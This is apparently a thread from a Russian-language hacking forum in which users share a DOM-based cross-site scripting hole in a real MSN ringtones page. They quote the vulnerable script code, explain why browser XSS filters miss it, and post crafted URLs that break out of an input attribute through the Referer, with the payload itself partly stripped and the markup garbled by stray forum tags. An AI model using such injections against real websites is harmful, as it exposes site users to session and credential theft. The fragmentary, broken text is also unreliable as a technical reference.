Сообщение от
dev1k
Ещё один msn.com
http://ringtones.nl.
msn.com
/games.php?rtch=1&rtlo=41992
"/>
Это не обычная пассивка, а
DOM-based, поэтому защита от
XSS в браузерах на нее не сработает.
Со страницы вызывается скрипт
http://www.ringtonio.nl/javagames/?..., уязвимый к
XSS в реферере.
Данные из реферера выводятся в двух местах:
Сообщение от
None
d.writeln('window.open (bd+"/send/javagame?id="+nr+"&clx=1&rths=0&brpc=&rtlo=
41992\"/>
","sendpop","toolbar=no,location=no,directories=no ,status=yes,menubar=no,scrollbars=yes,resizable=no ,copyhistory=no,width=600,height=450,screenX=0,scr eenY=0,top=0,left=0");');
Сообщение от
None
d.writeln('[/COLOR][/B]
">');
Видно, что кавычки экранируются. Но это происходит внутри строки в функции вывода, поэтому на странице экранирования не будет.
В примере используется второй вариант вывода - внутри тега input. Но зачем лишние символы?
http://ringtones.nl.msn.com/games.php?rtch=1&rtlo=41992">[/COLOR]
Без них все работает нормально:
[B]http://ringtones.nl.msn.com/games.php?rtlo=">